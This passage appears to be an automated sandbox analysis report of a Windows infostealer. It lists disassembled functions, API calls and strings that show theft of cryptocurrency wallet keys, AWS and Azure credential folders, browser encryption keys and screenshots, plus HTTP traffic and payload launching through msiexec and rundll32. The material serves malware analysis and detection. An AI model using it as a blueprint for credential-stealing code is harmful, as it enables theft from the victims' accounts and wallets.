                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: 5d4833aca9ad367bd5f318623930eb267297f70a7487fc6c6a1e9f3d7d55c8fb
                                  • Instruction ID: a16fbbf1999c942be559bf43548cd4c92fe149985d88fb15fd7daa931c4a01aa
                                  • Opcode Fuzzy Hash: 5d4833aca9ad367bd5f318623930eb267297f70a7487fc6c6a1e9f3d7d55c8fb
                                  • Instruction Fuzzy Hash: ABE174719001089BDB18FBA0DD96EEE7778BF94301F418125F11BA3095DE38AE56EB63
                                  Function 00F6C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,016FCF90,00000000,?,00F8144C,00000000,?,?), ref: 00F6CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00F6CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00F6CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F6CAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00F6CAD9
                                  • StrStrA.SHLWAPI(?,016FCEA0,00F80B52), ref: 00F6CAF7
                                  • StrStrA.SHLWAPI(00000000,016FCFA8), ref: 00F6CB1E
                                  • StrStrA.SHLWAPI(?,016FD1F8,00000000,?,00F81458,00000000,?,00000000,00000000,?,016F88F0,00000000,?,00F81454,00000000,?), ref: 00F6CCA2
                                  • StrStrA.SHLWAPI(00000000,016FD018), ref: 00F6CCB9
                                    • Part of subcall function 00F6C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F6C871
                                    • Part of subcall function 00F6C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F6C87C
                                  • StrStrA.SHLWAPI(?,016FD018,00000000,?,00F8145C,00000000,?,00000000,016F8980), ref: 00F6CD5A
                                  • StrStrA.SHLWAPI(00000000,016F8AA0), ref: 00F6CD71
                                    • Part of subcall function 00F6C820: lstrcat.KERNEL32(?,00F80B46), ref: 00F6C943
                                    • Part of subcall function 00F6C820: lstrcat.KERNEL32(?,00F80B47), ref: 00F6C957
                                    • Part of subcall function 00F6C820: lstrcat.KERNEL32(?,00F80B4E), ref: 00F6C978
                                  • lstrlen.KERNEL32(00000000), ref: 00F6CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 00F6CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 819cd6afdd6cc7403a234f5fd884eebe779e8171459183016cc9605a6e9830dd
                                  • Instruction ID: e8395a18bce401a2c358b96495480fcc186495913139f6be8c1e4082bc5d7f28
                                  • Opcode Fuzzy Hash: 819cd6afdd6cc7403a234f5fd884eebe779e8171459183016cc9605a6e9830dd
                                  • Instruction Fuzzy Hash: 1FE11571D00108ABDB19EBA0DC91FEEB778AF54300F41816AF11A67191EF346A4ADF63
                                  Function 00F78320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,016FAB60,00000000,00020019,00000000,00F805B6), ref: 00F783A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F78426
                                  • wsprintfA.USER32 ref: 00F78459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F7847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F7848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F78499
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: 52091197a8eb0e95539ab629a357cfbf102c8dd9aac2e81d91ce0bfbd391d42a
                                  • Instruction ID: e929bec10027f07f450b54c6c7175bf0aa82d59e31df49a4de822361608a9e04
                                  • Opcode Fuzzy Hash: 52091197a8eb0e95539ab629a357cfbf102c8dd9aac2e81d91ce0bfbd391d42a
                                  • Instruction Fuzzy Hash: 1F814F71910118ABDB68DB54DC85FEE77B8BF48700F40C299E10AA6180DF756F86DF92
                                  Function 00F74D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F78DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F78E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F74DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00F74DCD
                                    • Part of subcall function 00F74910: wsprintfA.USER32 ref: 00F7492C
                                    • Part of subcall function 00F74910: FindFirstFileA.KERNEL32(?,?), ref: 00F74943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F74E3C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00F74E59
                                    • Part of subcall function 00F74910: StrCmpCA.SHLWAPI(?,00F80FDC), ref: 00F74971
                                    • Part of subcall function 00F74910: StrCmpCA.SHLWAPI(?,00F80FE0), ref: 00F74987
                                    • Part of subcall function 00F74910: FindNextFileA.KERNEL32(000000FF,?), ref: 00F74B7D
                                    • Part of subcall function 00F74910: FindClose.KERNEL32(000000FF), ref: 00F74B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F74EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00F74EE5
                                    • Part of subcall function 00F74910: wsprintfA.USER32 ref: 00F749B0
                                    • Part of subcall function 00F74910: StrCmpCA.SHLWAPI(?,00F808D2), ref: 00F749C5
                                    • Part of subcall function 00F74910: wsprintfA.USER32 ref: 00F749E2
                                    • Part of subcall function 00F74910: PathMatchSpecA.SHLWAPI(?,?), ref: 00F74A1E
                                    • Part of subcall function 00F74910: lstrcat.KERNEL32(?,016FE550), ref: 00F74A4A
                                    • Part of subcall function 00F74910: lstrcat.KERNEL32(?,00F80FF8), ref: 00F74A5C
                                    • Part of subcall function 00F74910: lstrcat.KERNEL32(?,?), ref: 00F74A70
                                    • Part of subcall function 00F74910: lstrcat.KERNEL32(?,00F80FFC), ref: 00F74A82
                                    • Part of subcall function 00F74910: lstrcat.KERNEL32(?,?), ref: 00F74A96
                                    • Part of subcall function 00F74910: CopyFileA.KERNEL32(?,?,00000001), ref: 00F74AAC
                                    • Part of subcall function 00F74910: DeleteFileA.KERNEL32(?), ref: 00F74B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: 5d15b3e616821a7676ca7c4e8f1ed4aa2fd8f1c964ac6684310c1c2beccd204a
                                  • Instruction ID: bc57c8ccb65a400a5e8b92fe5efe38b8d2fc55e17fae519a9d0f2c4843be46a0
                                  • Opcode Fuzzy Hash: 5d15b3e616821a7676ca7c4e8f1ed4aa2fd8f1c964ac6684310c1c2beccd204a
                                  • Instruction Fuzzy Hash: 4441B37A94020466DB64F770EC47FDD7638AB64700F408565B289660C1EEB89BC9AB93
                                  Function 00F79010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F7906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: 480a25187d4d7406368eed7038ef611eef75d324a31e864135f9d2d42b712a38
                                  • Instruction ID: fdde1d04e5adb0baac57c2fe0db33ebd0026bd5d642b96c804f671b0a6908bdf
                                  • Opcode Fuzzy Hash: 480a25187d4d7406368eed7038ef611eef75d324a31e864135f9d2d42b712a38
                                  • Instruction Fuzzy Hash: D2713375900208ABCB14EFE4EC89FEEBBB8BF48700F548119F516E7284DB74A945DB61
                                  Function 00F72E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00F731C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00F7335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00F734EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 05ef7274aa8ed5e8a8e47624625e31f40f2bee61e0310ce2df2669bf984dba0e
                                  • Instruction ID: 6e6cf3b4d34f6b9c1b9ffe0f511131f7cda793adb53effda68de3abc33132267
                                  • Opcode Fuzzy Hash: 05ef7274aa8ed5e8a8e47624625e31f40f2bee61e0310ce2df2669bf984dba0e
                                  • Instruction Fuzzy Hash: AD1214718001089ADB19FBA0DC52FEE7738AF54300F51C16AF51A66191EF386B4AEF53
                                  Function 00F752C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F66280: InternetOpenA.WININET(00F80DFE,00000001,00000000,00000000,00000000), ref: 00F662E1
                                    • Part of subcall function 00F66280: StrCmpCA.SHLWAPI(?,016FE4D0), ref: 00F66303
                                    • Part of subcall function 00F66280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F66335
                                    • Part of subcall function 00F66280: HttpOpenRequestA.WININET(00000000,GET,?,016FDA18,00000000,00000000,00400100,00000000), ref: 00F66385
                                    • Part of subcall function 00F66280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F663BF
                                    • Part of subcall function 00F66280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F663D1
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F75318
                                  • lstrlen.KERNEL32(00000000), ref: 00F7532F
                                    • Part of subcall function 00F78E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F78E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00F75364
                                  • lstrlen.KERNEL32(00000000), ref: 00F75383
                                  • lstrlen.KERNEL32(00000000), ref: 00F753AE
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: fa714348e57659209ddecee76054eb8d780928131675f6dda39779726578c5c2
                                  • Instruction ID: 1d913f325909844a9b7ccc2b12fd24c0172605d6d310a3d13f471a4cb6955613
                                  • Opcode Fuzzy Hash: fa714348e57659209ddecee76054eb8d780928131675f6dda39779726578c5c2
                                  • Instruction Fuzzy Hash: F1512F309101489BDB18FF60CD96AEE7779AF90301F518029F41E9B191EF386B46EB63
                                  Function 00F712D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: a127f5c22dade93880a568034b5983df98d215fbf4b5710c4ebdafac9912e9ad
                                  • Instruction ID: 22a6a6849b69f8c4cff7e89b33c3167e38c05de7a729dc8736b6b116759c3764
                                  • Opcode Fuzzy Hash: a127f5c22dade93880a568034b5983df98d215fbf4b5710c4ebdafac9912e9ad
                                  • Instruction Fuzzy Hash: 3FC1C8B59401099BCB18EF60DC89FEE7778BF94300F0085A9F51EA7141EB74AA85DF92
                                  Function 00F74280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F78DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F78E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F742EC
                                  • lstrcat.KERNEL32(?,016FDF28), ref: 00F7430B
                                  • lstrcat.KERNEL32(?,?), ref: 00F7431F
                                  • lstrcat.KERNEL32(?,016FCED0), ref: 00F74333
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F78D90: GetFileAttributesA.KERNEL32(00000000,?,00F61B54,?,?,00F8564C,?,?,00F80E1F), ref: 00F78D9F
                                    • Part of subcall function 00F69CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F69D39
                                    • Part of subcall function 00F699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F699EC
                                    • Part of subcall function 00F699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F69A11
                                    • Part of subcall function 00F699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F69A31
                                    • Part of subcall function 00F699C0: ReadFile.KERNEL32(000000FF,?,00000000,00F6148F,00000000), ref: 00F69A5A
                                    • Part of subcall function 00F699C0: LocalFree.KERNEL32(00F6148F), ref: 00F69A90
                                    • Part of subcall function 00F699C0: CloseHandle.KERNEL32(000000FF), ref: 00F69A9A
                                    • Part of subcall function 00F793C0: GlobalAlloc.KERNEL32(00000000,00F743DD,00F743DD), ref: 00F793D3
                                  • StrStrA.SHLWAPI(?,016FDFA0), ref: 00F743F3
                                  • GlobalFree.KERNEL32(?), ref: 00F74512
                                    • Part of subcall function 00F69AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F64EEE,00000000,00000000), ref: 00F69AEF
                                    • Part of subcall function 00F69AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00F64EEE,00000000,?), ref: 00F69B01
                                    • Part of subcall function 00F69AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F64EEE,00000000,00000000), ref: 00F69B2A
                                    • Part of subcall function 00F69AC0: LocalFree.KERNEL32(?,?,?,?,00F64EEE,00000000,?), ref: 00F69B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F744A3
                                  • StrCmpCA.SHLWAPI(?,00F808D1), ref: 00F744C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00F744D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00F744E5
                                  • lstrcat.KERNEL32(00000000,00F80FB8), ref: 00F744F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
